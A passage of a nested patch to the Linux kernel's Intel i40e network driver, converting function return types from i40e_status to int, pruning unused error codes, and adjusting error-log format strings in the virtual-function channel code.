++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_lldp_mib(struct i40e_hw *hw,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
++			 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
++			       bool dcb_enable,
+ 			       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
+-				u16 seid, u16 credit, u8 max_bw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
+ 			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+-	u16 seid,
+-	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+-	struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
++int i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
++					u16 seid, u16 credit, u8 max_bw,
++					struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++				   u16 seid,
++				   struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++				   enum i40e_admin_queue_opc opcode,
+ 				   struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
+-i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+-			     struct i40e_aqc_cloud_filters_element_bb *filters,
+-			     u8 filter_count);
+-enum i40e_status_code
+-i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 vsi,
+-			  struct i40e_aqc_cloud_filters_element_data *filters,
+-			  u8 filter_count);
+-enum i40e_status_code
+-i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 vsi,
+-			  struct i40e_aqc_cloud_filters_element_data *filters,
+-			  u8 filter_count);
+-enum i40e_status_code
+-i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+-			     struct i40e_aqc_cloud_filters_element_bb *filters,
+-			     u8 filter_count);
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg);
+-enum i40e_status_code
+-i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+-			struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++					 u16 seid,
++					 struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
++					 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++				u16 seid,
++				struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++					 u16 seid,
++					 struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++					 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++				  u16 seid,
++				  struct i40e_aqc_query_port_ets_config_resp *bw_data,
++				  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++					u16 seid,
++					struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++					struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
++				 struct i40e_aqc_cloud_filters_element_bb *filters,
++				 u8 filter_count);
++int i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 vsi,
++			      struct i40e_aqc_cloud_filters_element_data *filters,
++			      u8 filter_count);
++int i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 vsi,
++			      struct i40e_aqc_cloud_filters_element_data *filters,
++			      u8 filter_count);
++int i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
++				 struct i40e_aqc_cloud_filters_element_bb *filters,
++				 u8 filter_count);
++int i40e_read_lldp_cfg(struct i40e_hw *hw, struct i40e_lldp_variables *lldp_cfg);
++int i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details);
+ /* i40e_common */
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw);
+-i40e_status i40e_pf_reset(struct i40e_hw *hw);
++int i40e_init_shared_code(struct i40e_hw *hw);
++int i40e_pf_reset(struct i40e_hw *hw);
+ void i40e_clear_hw(struct i40e_hw *hw);
+ void i40e_clear_pxe_mode(struct i40e_hw *hw);
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
+-i40e_status i40e_update_link_info(struct i40e_hw *hw);
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw, bool *min_valid,
+-				      bool *max_valid);
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size);
+-i40e_status i40e_validate_mac_addr(u8 *mac_addr);
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
++int i40e_update_link_info(struct i40e_hw *hw);
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw, bool *min_valid,
++			      bool *max_valid);
++int i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++				   struct i40e_aqc_configure_partition_bw_data *bw_data,
++				   struct i40e_asq_cmd_details *cmd_details);
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num, u32 pba_num_size);
++int i40e_validate_mac_addr(u8 *mac_addr);
+ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable);
+ /* prototype for functions used for NVM access */
+-i40e_status i40e_init_nvm(struct i40e_hw *hw);
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				      enum i40e_aq_resource_access_type access);
++int i40e_init_nvm(struct i40e_hw *hw);
++int i40e_acquire_nvm(struct i40e_hw *hw, enum i40e_aq_resource_access_type access);
+ void i40e_release_nvm(struct i40e_hw *hw);
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-					 u16 *data);
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr);
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data);
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw);
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum);
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *);
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset, u16 *data);
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr);
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset, u16 *words, u16 *data);
++int i40e_update_nvm_checksum(struct i40e_hw *hw);
++int i40e_validate_nvm_checksum(struct i40e_hw *hw, u16 *checksum);
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *);
+ void i40e_nvmupd_check_wait_event(struct i40e_hw *hw, u16 opcode,
+ 				  struct i40e_aq_desc *desc);
+ void i40e_nvmupd_clear_wait_state(struct i40e_hw *hw);
+ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status);
+ 
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw);
++int i40e_set_mac_type(struct i40e_hw *hw);
+ 
+ extern struct i40e_rx_ptype_decoded i40e_ptype_lookup[];
+ 
+@@ -419,41 +402,41 @@ i40e_virtchnl_link_speed(enum i40e_aq_link_speed link_speed)
+ /* i40e_common for VF drivers*/
+ void i40e_vf_parse_hw_config(struct i40e_hw *hw,
+ 			     struct virtchnl_vf_resource *msg);
+-i40e_status i40e_vf_reset(struct i40e_hw *hw);
+-i40e_status i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
+-				enum virtchnl_ops v_opcode,
+-				i40e_status v_retval,
+-				u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings);
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_vf_reset(struct i40e_hw *hw);
++int i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
++			   enum virtchnl_ops v_opcode,
++			   int v_retval,
++			   u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings);
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details);
+ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 						    u16 vsi_seid);
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr);
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details);
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val);
+-enum i40e_status_code
++int
+ i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+ 			     u32 reg_addr, u32 reg_val,
+ 			     struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int
+ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+@@ -466,43 +449,43 @@ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ #define i40e_aq_get_phy_register(hw, ps, da, pc, ra, rv, cd)		\
+ 	i40e_aq_get_phy_register_ext(hw, ps, da, pc, false, 0, ra, rv, cd)
+ 
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				   u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				    u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			   u8 phy_addr, u16 *value);
++int i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			    u8 phy_addr, u16 value);
+ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
+-i40e_status i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-			      u16 buff_size, u32 track_id,
+-			      u32 *error_offset, u32 *error_info,
+-			      struct i40e_asq_cmd_details *
+-			      cmd_details);
+-i40e_status i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				 u16 buff_size, u8 flags,
+-				 struct i40e_asq_cmd_details *
+-				 cmd_details);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *
++		      cmd_details);
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *
++			 cmd_details);
+ struct i40e_generic_seg_header *
+ i40e_find_segment_in_package(u32 segment_type,
+ 			     struct i40e_package_header *pkg_header);
+ struct i40e_profile_section_header *
+ i40e_find_section_in_profile(u32 section_type,
+ 			     struct i40e_profile_segment *profile);
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
+ 		   u32 track_id);
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
+ 		      u32 track_id);
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_status.h b/drivers/net/ethernet/intel/i40e/i40e_status.h
+index db3714a65dc71..4d2782e76038b 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_status.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_status.h
+@@ -9,65 +9,30 @@ enum i40e_status_code {
+ 	I40E_SUCCESS				= 0,
+ 	I40E_ERR_NVM				= -1,
+ 	I40E_ERR_NVM_CHECKSUM			= -2,
+-	I40E_ERR_PHY				= -3,
+ 	I40E_ERR_CONFIG				= -4,
+ 	I40E_ERR_PARAM				= -5,
+-	I40E_ERR_MAC_TYPE			= -6,
+ 	I40E_ERR_UNKNOWN_PHY			= -7,
+-	I40E_ERR_LINK_SETUP			= -8,
+-	I40E_ERR_ADAPTER_STOPPED		= -9,
+ 	I40E_ERR_INVALID_MAC_ADDR		= -10,
+ 	I40E_ERR_DEVICE_NOT_SUPPORTED		= -11,
+-	I40E_ERR_PRIMARY_REQUESTS_PENDING	= -12,
+-	I40E_ERR_INVALID_LINK_SETTINGS		= -13,
+-	I40E_ERR_AUTONEG_NOT_COMPLETE		= -14,
+ 	I40E_ERR_RESET_FAILED			= -15,
+-	I40E_ERR_SWFW_SYNC			= -16,
+ 	I40E_ERR_NO_AVAILABLE_VSI		= -17,
+ 	I40E_ERR_NO_MEMORY			= -18,
+ 	I40E_ERR_BAD_PTR			= -19,
+-	I40E_ERR_RING_FULL			= -20,
+-	I40E_ERR_INVALID_PD_ID			= -21,
+-	I40E_ERR_INVALID_QP_ID			= -22,
+-	I40E_ERR_INVALID_CQ_ID			= -23,
+-	I40E_ERR_INVALID_CEQ_ID			= -24,
+-	I40E_ERR_INVALID_AEQ_ID			= -25,
+ 	I40E_ERR_INVALID_SIZE			= -26,
+-	I40E_ERR_INVALID_ARP_INDEX		= -27,
+-	I40E_ERR_INVALID_FPM_FUNC_ID		= -28,
+-	I40E_ERR_QP_INVALID_MSG_SIZE		= -29,
+-	I40E_ERR_QP_TOOMANY_WRS_POSTED		= -30,
+-	I40E_ERR_INVALID_FRAG_COUNT		= -31,
+ 	I40E_ERR_QUEUE_EMPTY			= -32,
+-	I40E_ERR_INVALID_ALIGNMENT		= -33,
+-	I40E_ERR_FLUSHED_QUEUE			= -34,
+-	I40E_ERR_INVALID_PUSH_PAGE_INDEX	= -35,
+-	I40E_ERR_INVALID_IMM_DATA_SIZE		= -36,
+ 	I40E_ERR_TIMEOUT			= -37,
+-	I40E_ERR_OPCODE_MISMATCH		= -38,
+-	I40E_ERR_CQP_COMPL_ERROR		= -39,
+-	I40E_ERR_INVALID_VF_ID			= -40,
+-	I40E_ERR_INVALID_HMCFN_ID		= -41,
+-	I40E_ERR_BACKING_PAGE_ERROR		= -42,
+-	I40E_ERR_NO_PBLCHUNKS_AVAILABLE		= -43,
+-	I40E_ERR_INVALID_PBLE_INDEX		= -44,
+ 	I40E_ERR_INVALID_SD_INDEX		= -45,
+ 	I40E_ERR_INVALID_PAGE_DESC_INDEX	= -46,
+ 	I40E_ERR_INVALID_SD_TYPE		= -47,
+-	I40E_ERR_MEMCPY_FAILED			= -48,
+ 	I40E_ERR_INVALID_HMC_OBJ_INDEX		= -49,
+ 	I40E_ERR_INVALID_HMC_OBJ_COUNT		= -50,
+-	I40E_ERR_INVALID_SRQ_ARM_LIMIT		= -51,
+-	I40E_ERR_SRQ_ENABLED			= -52,
+ 	I40E_ERR_ADMIN_QUEUE_ERROR		= -53,
+ 	I40E_ERR_ADMIN_QUEUE_TIMEOUT		= -54,
+ 	I40E_ERR_BUF_TOO_SHORT			= -55,
+ 	I40E_ERR_ADMIN_QUEUE_FULL		= -56,
+ 	I40E_ERR_ADMIN_QUEUE_NO_WORK		= -57,
+-	I40E_ERR_BAD_IWARP_CQE			= -58,
+ 	I40E_ERR_NVM_BLANK_MODE			= -59,
+ 	I40E_ERR_NOT_IMPLEMENTED		= -60,
+-	I40E_ERR_PE_DOORBELL_NOT_ENABLED	= -61,
+ 	I40E_ERR_DIAG_TEST_FAILED		= -62,
+ 	I40E_ERR_NOT_READY			= -63,
+ 	I40E_NOT_SUPPORTED			= -64,
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 635f93d603186..cb7cf672f6971 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -17,7 +17,7 @@
+  **/
+ static void i40e_vc_vf_broadcast(struct i40e_pf *pf,
+ 				 enum virtchnl_ops v_opcode,
+-				 i40e_status v_retval, u8 *msg,
++				 int v_retval, u8 *msg,
+ 				 u16 msglen)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+@@ -1246,13 +1246,13 @@ err:
+  * @vl: List of VLANs - apply filter for given VLANs
+  * @num_vlans: Number of elements in @vl
+  **/
+-static i40e_status
++static int
+ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 		     bool unicast_enable, s16 *vl, u16 num_vlans)
+ {
+-	i40e_status aq_ret, aq_tmp = 0;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
++	int aq_ret, aq_tmp = 0;
+ 	int i;
+ 
+ 	/* No VLAN to set promisc on, set on VSI */
+@@ -1264,9 +1264,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			return aq_ret;
+@@ -1280,9 +1280,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 		}
+ 
+@@ -1297,9 +1297,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1313,9 +1313,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1339,13 +1339,13 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+  * Called from the VF to configure the promiscuous mode of
+  * VF vsis and from the VF reset path to reset promiscuous mode.
+  **/
+-static i40e_status i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
+-						   u16 vsi_id,
+-						   bool allmulti,
+-						   bool alluni)
++static int i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
++					   u16 vsi_id,
++					   bool allmulti,
++					   bool alluni)
+ {
+-	i40e_status aq_ret = I40E_SUCCESS;
+ 	struct i40e_pf *pf = vf->pf;
++	int aq_ret = I40E_SUCCESS;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_vlans;
+ 	s16 *vl;
+@@ -1955,7 +1955,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	int abs_vf_id;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	/* validate the request */
+ 	if (!vf || vf->vf_id >= vf->pf->num_alloc_vfs)
+@@ -1987,7 +1987,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+  **/
+ static int i40e_vc_send_resp_to_vf(struct i40e_vf *vf,
+ 				   enum virtchnl_ops opcode,
+-				   i40e_status retval)
++				   int retval)
+ {
+ 	return i40e_vc_send_msg_to_vf(vf, opcode, retval, NULL, 0);
+ }
+@@ -2091,9 +2091,9 @@ static int i40e_vc_get_vf_resources_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_vf_resource *vfres = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 	int num_vsis = 1;
++	int aq_ret = 0;
+ 	size_t len = 0;
+ 	int ret;
+ 
+@@ -2221,9 +2221,9 @@ static int i40e_vc_config_promiscuous_mode_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_promisc_info *info =
+ 	    (struct virtchnl_promisc_info *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	bool allmulti = false;
+ 	bool alluni = false;
++	int aq_ret = 0;
+ 
